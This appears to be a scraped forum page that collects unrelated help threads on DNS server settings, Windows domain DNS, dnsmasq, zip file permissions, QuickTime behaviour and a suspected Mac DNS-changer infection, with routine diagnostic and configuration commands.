QT Plugins mucking with DNS servers via scutil? Possible security issue?

Similar Messages

• Possible Security issue with .zip files

  I found a potential issue with expanding .zip files. In the cases I've seen, the .zip files were created on Windows using Winzip. After copying the files to my OS X system, I double-clicked the file to expand the files and folders. (In this case the zip files was a Ruby on Rails web application.) In looking at the files in the terminal, all the files had wide open permission - 777 - all users had full access to all files!
  I had to go through and reset the permissions (755 for folders, 644 for files), and had to reset the execute permission on the Ruby script files.
  I'm going to test some more with more zip files, but this could be a potentially huge problem.
  Also, I noticed that the files had the "extended attribute" of com.apple.quarantine set on each file - which I assume is being set as a function of being downloaded via Safari from my webmail (Gmail) account. The .zip file had this attribute set, and when expanded it propagated to each file and folder.

  The files don't have any security on them from windows - windows doesn't know anything about unix permissions.
  I've compressed other files and folders on Windows and decompressed them in Tiger without a problem. I would think, at a minimum, the files would inherit the permissions of the parent folder I expanded them into.

• How can I resolve as possible security issue with unauthorized computers through QuickTime , as a diagnostic and screen shots show evidence of a Mac computer and I don't have one?

  II'm trying to resolve an issue that I have with my iPhone 4s through QuickTime. I think it might be an embedded mms that might broadcasts my info as well as allows remote access sometimes. Any answers or similar activity?, I can support with screenshots of public information . This shows in my emIl accounts as well.

  Is your phone jailbroken? If it is not, you're probably not seeing what you think you're seeing. If your phone hasn't been jailbroken, it's certainly not being controlled remotely. What do you mean by an "embedded mms"? Are you sharing an Apple ID with anyone? Or could someone have gotten access to your Apple ID information?

• Possible Security Issues with Quicktime?

  Hi all,
  I keep a pretty close security watch on my computer and what is happening in the background. I have Norton NAV2008 and Spy Sweeper running and I am always going into Norton to see what the activity list has to say.
  Quicktime (qttask.exe) makes frequent and large changes to my Windows start-up files through modification of the registry settings.
  I do not like to see programs making these changes, as most malware and worms do this type of thing.
  Is this normal activity for Quick Time or should I be worried here?

  Ken,
  Thanks for answering. Norton just reports the activity as "qttask.exe has made 79 changes to your Windows Start up Files". It gives it a low priority and didn't come up as a "pop up" that required action. It seems like it knows that Quicktime is a program that sometimes does this and it is just reporting it as such.
  As I said, I have no idea whether QT does these changes on a regular basis as part of its program, hence my question here. Yes, QT is used by Itunes and that is what I exclusively use it for. Itunes doesn't work without it apparently, as I noticed the file manipulation and previously removed Quicktime. Then when I tried to use Itunes, it squawked and said QT wan't installed.
  Thanks again for the reply.

• What is going on with the DNS servers?

  I've been having intermittent connection problems with "DNS Server Not Responding" identified as the error by Win 7 troubleshooting for a little while now.
  This has been sporadic for a couple of months and usually resolves itself after a short time, but in the last few days I've barely been able to access the internet at all, with the exception of a handful of websites and today it came to a head and I could only access a couple of websites for most of the day.
  Thankfully I finally managed to find a website that I could access to remind myself of the addresses for the free google DNS servers and am now back online.
  Just wanted to stop by to report the issue and ask What on earth is going on with BTs DNS servers? 

  Hi Epona222,
  Thanks for posting. There are no reports of any specific issues with DNS servers but I can check your connection etc for you if you wish. Drop me an email with the details. You'll find the "contact us" form in the about me section of my profile.
  Cheers
  David
  BTCare Community Mod
  If we have asked you to email us with your details, please make sure you are logged in to the forum, otherwise you will not be able to see our ‘Contact Us’ link within our profiles.
  We are sorry but we are unable to deal with service/account queries via the private message(PM) function so please don't PM your account info, we need to deal with this via our email account :-)

• Mail is not connecting with pop servers

  Question 1.- I have two email addresses that I manage with Mail.  Both are POP. Suddenly Mail stopped connecting with both of them.  I erased an account and can't set up the new one because it gives me an error message to check my user name and password.  On the other hand, my iphone is working fine with both servers. Support people at one of the providers couldn't help me.
  Can somebody help me?
  Question 2.- When I set up my Prodigy account, it automatically shows as "Yahoo POP".   Prodigy has nothing to do with Yahoo so, anybody knows why this happens?
  Thank you!!!

  Okay, now we're a bit further... I hope...
  First,
  Just tried and now I can't send anything from the server Tagra from my iphone either!! What a mess!! It's telling me the server does not allow relaying.
  that's easy: You must be trying to send email with or from a different address (e.g. [email protected]) by using the Tagra SMTP server (mail.tagra.com.mx). Most SMTP servers don't like that and protest.
  So, on your iPhone, go to Settings and the Prodigy and any other non-Tagra account, and make sure that not mail.tagra.com.mx but the correct outgoing mail server is chosen! Only your Tagra account must use Tagra servers, no other one!
  For iPhone setup see e.g. this Prodigy iPhone setup.
  That should work again.
  Now back to your Mac.
  Your trouble could be the result of some hiccup in a DNS server. So, you'll make one addition and one change to be safe. No worries, it's nothing critical, I'll try to explain here:
  1) I guess the current DNS entry in your Mac (192.168.1.254) is your router's IP address, and in the router are DNS addresses stored. To be safe, please add in Network -> Advanced -> DNS under DNS server also these two numbers: 200.33.146.193 and 200.33.146.201, above the old number, and each one in its own line. These two are some of Prodigy's DNS servers. So, it should read now:
  200.33.146.193
  200.33.146.201
  192.168.1.254
  Okay! This will make sure that your Mac uses Prodigy DNS servers, no matter what's in your router, but the router stays in as well.
  2) In Apple Mail -> Preferences -> Prodigy account, replace the mail server names in text format with their IP addresses in number format. It's the same, but avoids certain trouble with DNS servers.
  For the Incoming Mail Server, make it: 148.235.52.179
  For the Outgoing Mail Server, make it: 148.235.52.32
  Again, it's the same servers, only in number format. And you can always change it back, only we have reason to hope that with the numbers it'll work.
  All other settings incl ports etc must remain the same, e.g. the same as in the iPhone instructions.
  Now close all apps, and restart the Mac.
  And now try if Apple Mail works for your Prodigy account... I'm crossing my fingers...

• Best practices for 2 x DNS servers with 2 x sites

  I am curious if someone can help me with best practices for my DNS servers.  Let me give my network layout first.
  I have 1 site with 2 x Windows 2012 Servers (1 GUI - 10.0.0.7, the other CORE - 10.0.0.8) the 2nd site connected via VPN has 2 x Windows 2012R2 Servers (1 GUI - 10.2.0.7, the other CORE - 10.2.0.8)  All 4 servers are promoted to DC's and have DNS services
  running.
  Here goes my questions:
  Site #1
  DC-01 - NIC IP address for DNS server #1 set to 10.0.0.8, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.2.0.7 & 10.2.0.8)
  DC-02 - NIC IP address for DNS server #1 set to 10.0.0.7, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.2.0.7 & 10.2.0.8)
  Site #2
  DC-01 - NIC IP address for DNS server #1 set to 10.2.0.8, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.0.0.7 & 10.0.0.8)
  DC-02 - NIC IP address for DNS server #1 set to 10.2.0.7, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.0.0.7 & 10.0.0.8)
  Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local
  > properties > Name Servers should I have all of my other DNS servers, or should I have my WAN DNS servers? In a single server scenario I always put my WAN DNS server but a bit unsure in this scenario. 
  Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > General > Type should all servers be set to
  Active Directory - Integrated > Primary Zone? Should any of these be set to
  Secondary Zone?
  Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > Zone Transfers should I allow zone transfers?
  Would the following questions be identical to the Forward Lookup Zone mydomain.local as well?

  I am curious if someone can help me with best practices for my DNS servers.  Let me give my network layout first.
  I have 1 site with 2 x Windows 2012 Servers (1 GUI - 10.0.0.7, the other CORE - 10.0.0.8) the 2nd site connected via VPN has 2 x Windows 2012R2 Servers (1 GUI - 10.2.0.7, the other CORE - 10.2.0.8)  All 4 servers are promoted to DC's and have DNS services
  running.
  Here goes my questions:
  Site #1
  DC-01 - NIC IP address for DNS server #1 set to 10.0.0.8, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.2.0.7 & 10.2.0.8)
  DC-02 - NIC IP address for DNS server #1 set to 10.0.0.7, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.2.0.7 & 10.2.0.8)
  Site #2
  DC-01 - NIC IP address for DNS server #1 set to 10.2.0.8, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.0.0.7 & 10.0.0.8)
  DC-02 - NIC IP address for DNS server #1 set to 10.2.0.7, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.0.0.7 & 10.0.0.8)
  Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local
  > properties > Name Servers should I have all of my other DNS servers, or should I have my WAN DNS servers? In a single server scenario I always put my WAN DNS server but a bit unsure in this scenario. 
  Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > General > Type should all servers be set to
  Active Directory - Integrated > Primary Zone? Should any of these be set to
  Secondary Zone?
  Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > Zone Transfers should I allow zone transfers?
  Would the following questions be identical to the Forward Lookup Zone mydomain.local as well?
  Site1
  DC1: Primary 10.0.0.7. Secondary 10.0.0.8. Tertiary 127.0.0.1
  DC2: Primary 10.0.0.8.  Secondary 10.0.0.7. Tertiary 127.0.0.1
  Site2
  DC1: Primary 10.2.0.7.  Secondary 10.2.0.8. Tertiary 127.0.0.1
  DC2: Primary 10.2.0.8.  Secondary 10.2.0.7. Tertiary 127.0.0.1
  The DC's should automatically register in msdcs.  Do not register external DNS servers in msdcs or it will lead to issues. Yes, I recommend all zones to be set to AD-integrated. No need to allow zone transfers as AD replication will take care
  of this for you.  Same for mydomain.local.
  Hope this helps.  

• Update Policy for multiple networks with specific DNS servers

  I have a mid size network with 5 locations all with different IP addresses. All sites host their own DNS servers and connect directly through an ISP dedicated VLAN.
  Main Site
  10.1.1.1
  255.0.0.0
  Remote Site 1
  192.168.100.1
  255.255.255.0
  Remote Site 2
  192.168.101.1
  255.255.255.0
  Remote Site 3
  192.168.102.1
  255.255.255.0
  Remote Site 4
  192.168.103.1
  255.255.255.0
  All sites can be managed through the main site, but have their own DNS servers on location.
  My purpose is to point all computers and devices to a new DNS server from their previous static assignment. (XP and later versions)
  My question is can I use GP or DHCP* to push DNS server information to each device making them site specific without having to travel to those locations?
  Requirements:
  All devices on 10.1.1.1 will be changing from 10.1.1.2 to 10.1.1.4 (decom of old 2k3 server)
  DNS servers at each 192 location will need to point secondary server to 10.1.1.4
  Devices at main will need to use 10.1.1.4 as primary and 10.1.1.3 as secondary.
  Devices at each site will need to keep their respective DNS server.
  *If I use DHCP to change the information on a per scope level, can I use GP to force computers with locally set static assignments to update to DHCP static assignments
  Bonus: If anyone can give me an estimate on how much network traffic/bandwidth this would create that would be great because I would consider staggering the assignments as I am a 24 hour business.

  Hi,
  You may configure a Scheduled Task Item in Group Policy.
  To create a new Scheduled Task preference item, please follow the steps below,
  Open the Group Policy Management Console . Right-click the Group Policy object (GPO) that should contain the new preference item, and then click
  Edit .
  In the console tree under Computer Configuration or
  User Configuration , expand the Preferences folder, and then expand the
  Control Panel Settings folder.
  Right-click the Scheduled Tasks node, point to
  New , and select Scheduled Task .
  In the New Scheduled Task Properties dialog box, select an
  Action for Group Policy to perform. (For more information, see "Actions" in this topic.)
  On the Task tab, enter task settings for Group Policy to configure or remove. (For more information, see "Task settings" in this topic.)
  If creating, updating, or replacing a task:
  Click the Schedule tab, and configure one or more schedules for the task. (For more information, see "Schedule settings" in this topic.)
  Click the Settings tab, and enter any additional task settings for Group Policy to configure. (For more information, see "Other scheduled task settings" in this topic.)
  Click the Common tab, configure any options, and then type your comments in the
  Description box. (For more information, see
  Configure Common Options.)
  Click OK . The new preference item appears in the details pane.
  In the task, you may use netsh to set the DNS address.
  netsh interface ip set dns name="Local Area Connection" static yourdnssetting
  Here is an article about netsh command,
  http://technet.microsoft.com/en-us/library/cc738592(v=WS.10).aspx#BKMK_5
  Hope this helps.
  Steven Lee
  TechNet Community Support

• DNS forwarder with 2 real DNS servers, querying them simultaneously

  DNS forwarder with >2 real DNS servers, querying them simultaneously and ignoring "server can't find" errors
  Hi. When I connect to VPN, my normal DNS isnt queried, and DNS given by VPN answers: "server can't find"
  An extract from 'man resolv.conf'
  If there are multiple servers, the resolver library queries them in the  order  listed.
  I need another logic. All servers should be queried at the same time, and the soonest positive reply should be used.
  The algorithm  used  is to try a name server, and if the query times out, try the next, until out of name servers, then repeat trying all  the  name  servers  until  a  maximum number of etries are made.
  So, if I get "server can't find" error, the next DNS server not queried. I want the DNS forwarder to ignore such answers and wait for replies from other servers.
  What software can do this? Maybe dnsmasq? I plan to add 'nameserver 127.0.0.1' to the top of my resolv.conf and configure my scripts to add other nameservers below.

  All servers should be queried at the same time
  --all-servers
  dnsmasq: ignoring nameserver 127.0.0.1 - local interface
  good.
  How to tell dnsmasq to completely disable dhcp? List all interfaces like this?
  no-dhcp-interface=eth0
  no-dhcp-interface=tun0
  no-dhcp-interface=vboxnet0
  no-dhcp-interface=wlan0

• Configuring DNS servers with PPPoE

  Hi all,
  just received my base station, I'm trying to configure a custom couple of dns servers ( usually I work with opendns instead of the default ones from my ISP ) but after checking I notice that base station is still working with the default dns of my ISP. I tried to reset and re-configure the PPPoE connection but it still doesn't work.
  Any suggestion?

  Hello again, I feel sort of annoying by posting so many things. 
  I created a user in DC3 and it was replicated to DC1-New. If I do it the other way around, it does not work.
  In other words, the replication process only works this way DC3 --> DC1-New. I have checked it is not a firewall issue, all are off, since I began this lab.
  If I run repadmin /showrepl in DC1-New ,
  it sees DC3 and all success messages regarding the replication.
  If I run repadmin /showrepl in DC3,
  it just sees nothing.
  I also run dcdiag /test:knowsofroleholders in DC3 and
  there is this message: The holder of the Schema master is a deleted DC (DC1) . The same of all the 5 FSMOs. 
  I am trying to find a way to tell DC3 that the FSMOs holder is not DC1, but DC1-New. 
  Thanks for your support.
  Luis Olías Técnico/Admon Sistemas . Sevilla (España - Spain)

• Obtaining DNS servers automatically on Cisco ADSL routers;" not static dns with command dns-server x.x.x.x" ?

  Obtaining DNS servers automatically on Cisco ADSL routers;" not static dns with command dns-server x.x.x.x" ?

  Ok Thank you Karsten

• Enterprise DNS servers are not responding when using Windows NLB with Direct Access 2012

  Hi
  We have installed Direct Access 2012 as one server installation:
  - Two network cards. First one in DMZ and second one in internal network
  - Two consecutive IP addresses configured in DMZ because of Teredo
  - PKI because of Win7 Clients IPSec
  - Our corporate network is native IPv4 so we use DNS64/NAT64 and DA-server is configured as DNS
  - DA-servers are VMWare virtual machines 
  One server installation works fine and now we want to use Windows NLB as load balancing. NLB installation goes fine too,
  but problem is DNS. If we still try to use DA-server as DNS there comes error message below
  None of the enterprise DNS servers 2002:xxxx:xxxx:3333::1 used by DirectAccess clients for name resolution are responding. This might affect DirectAccess client connectivity to corporate resources.
  When trying to configure DNS using Infrastructure access setup, DNS cannot be validated when using DA-servers DIP or cluster VIP. Only domain local DNS looks to be ok but those have no IPv6 addressess. So how DNS should be configured when using multicast
  NLB? 
  Tried to remove name suffix then adding again => Detect DNS server => DA-server IPv6 address found => validate => The specified DNS server is not responding...
  Then tried to ping detected address => General failure
  NLB clusters are configured as multicast and static ARPs are configured too. Both clusters can be connected from those subnets as they should be. 
  Any clues how to fix this?
  ~ Jukka ~

  Hi,
  Your question falls into the paid support category which requires a more in-depth level of support.  Please visit the below link to see the various
  paid support options that are available to better meet your needs.
  http://support.microsoft.com/default.aspx?id=fh;en-us;offerprophone
  Regards,
  Mike
  Please remember to click “Mark as Answer” on the post that helps you, and to click “Unmark as Answer” if a marked post does not actually answer your question. This can be beneficial to other community members reading the thread.

• Manually set DNS servers in BT Homehub 2.0 with BT...

  Rather than having to se my DNS manually in network connections I was wondering if there was a setting on the homehub for changing DNS servers as I would like to use OpenDNS so I can test their web filtering capabilities.
  I have browsed the hub settings but there doesn't appear to be any setting to set DNS servers statically, it seems automatically use BTs DNS servers when the connection is live.

  Hi hippomango, your solution to override the DNS settings in the BT Homehub sounds interesting - except that I cannot get them to work!?
  I have a BT Homehub 3.0 (yes, you still can't override the default DNS settings), but I can't see that making much of a difference. I can't get any of the computers (wired or wireless) to use the OpenDNS settings in the 2nd router, they always find the BT DNS.
  Wondering if you can explain some more detail about your set up if possible?
  - Presumably your BT Hub is still your default gateway?
  - Your 2nd router (Netgear) has the BT Hub as the default gateway?
  - All computers are DHCP? Or do you have some static? (At least 1 of my machines needs a static local IP, but DHCP for the majority)
  TBH, I don't know how the DMZ helps in this case? (But that may be because I don't quite understand what's going on!) Doesn't the DMZ influence incoming traffic? Don't we want to direct outbound traffic?
  Thanks for any info.

• Mac using OS X 10.7 infected with dns changer?

  Hi. I was recently alerted by my internet company that my computer was infected with a virus called “dns changer.” Upon further inspection I found that one of my DNS servers matched up with a list of known rogue DNS servers.
  I have downloaded several virus scanning programs, such as macscan and virusbarrier x6 which were recommended to me. They didn’t turn up anything.
  I’ve been through the OS X 10.7 topics on the mac community as well as other websites (couldn’t find the “plugins.settings” in my Internet Plug-Ins folder and tried to pry it out using terminal). The same bad DNS server has mysteriously appeared on other computers that use the same internet connection out of my home and have not have any untrustworthy downloads.
  This is a real head scratcher. If anybody could help it would be much appreciated!

  I've recently had the same thing! I did the instructions above and got this
  Last login: Sun Apr 22 15:11:46 on ttys000
  dhcp-149-144-209-103:~ megansmart$ /usr/sbin/scutil --dns | grep nameserver
    nameserver[0] : 131.172.2.2
    nameserver[1] : 131.172.4.1
  dhcp-149-144-209-103:~ megansmart$
  help!

• Problem with DNS

  Hello,
  I am relatively new to configuring DNS settings in Server Manager. Recently, my Kerberos relm stopped working and I am now getting this error message on the console:
  configured name and reverse DNS name do not match (fileserver.occu-med.com != mail.occu-med.net), various services may not function properly - use changeip to repair and/or correct DNS
  I did, for a short time, try to register the server as a mail server. However, due to the many issues I experienced, this was a short lived endeavor. Right now I am running 10.4.11 on an Xserv. The box is functioning as a Fileserver running AFP and SMB, DHCP server, DNS Server, Firewall and NAT, an AD Server, and a VPN server. I have had no issues with the other services, they are all functioning fine. The only problem with OD is that it cannot Kerborize if the DNS is not functioning properly.
  I believe that the issue with the DNS can be attributed to the server being part of an external DNS relm as well as an internal DNS relm. There is definitely an entry for mail.occu-med.net in our ISP's DNS server, however on the internal network that I am running, occu-med.com, there is no such entry in our DNS records.
  I have tried the changeip command "changeip LDAPv3/127.0.0.1 "externaladdress" 10.0.0.2 mail.occu-med.net fileserver.occu-med.com to no avail.
  When I go into the Server Admin took to look at my network connections, it lists connection en0 (The outside portion of the NAT) as mail.occu-med.net. The connection en1 (the inside portion of the NAT) does not have an assigned DNS name.
  When I go into the Terminal on the Xserv and type in "hostname" I get "Fileserver.occu-med.com." However when I type in "host fileserver.occu-med.com" I get the error "Host fileserver.occu-med.com not found: 3(NXDOMAIN)" When I type in "host externalip" I get "externalip.in-addr.arpa domain name pointer mail.occu-med.net."
  Obviously the server is confused here, but how exactly can I fix the problem?

  DNS was working right before the server was propagated to a mai server. I have set up our internal domain to mirror the external domain by entering all of the ISP specific DNS information into the server so that users can access mail.occu-med.com via the internet. I have also set up specific internal DNS names that are not shared with the outside world, such as fileserver.occu-med.com that I do not want published to the external DNS servers. The problem I cannot get around is where the entry mail.occu-med.net is coming from and why it persists. When I was messing around with the mail functions of OS X Server, I deliberately made two different domains, one for occu-med.net and one for occu-med.com. This was short lived as the confusion on where to connect for certain services was giving even myself a headache, let alone my users. Thats when I started delving into setting up our own internal DNS server to provide FQDN services to internal machines. I deleted all of the old information in the server for the previous DNS Zones, but apparently something has not changed.
  Using a computer on the inside of my network, if I type into the console host mail.occu-med.net it returns "mail.occu-med.net has address 216.251.43.97"
  If I type host 209.234.153.2 I get "2.153.234.209.in-addr.arpa domain name pointer mail.occu-med.net."
  So, the server IS providing the wrong information to the internal clients somehow. The problem is that there is no mail.occu-med.net domain even hosted on the server. When I was original messing around with the server as a mail server, I had the connections reversed, en0 was the inside connection and en1 was the outside. I did have DNS working properly when i did this. Is it possible that somehow, while it may not be displayed in the Server Admin window, the current outside interface is still assigned the FQDN mail.occu-med.net?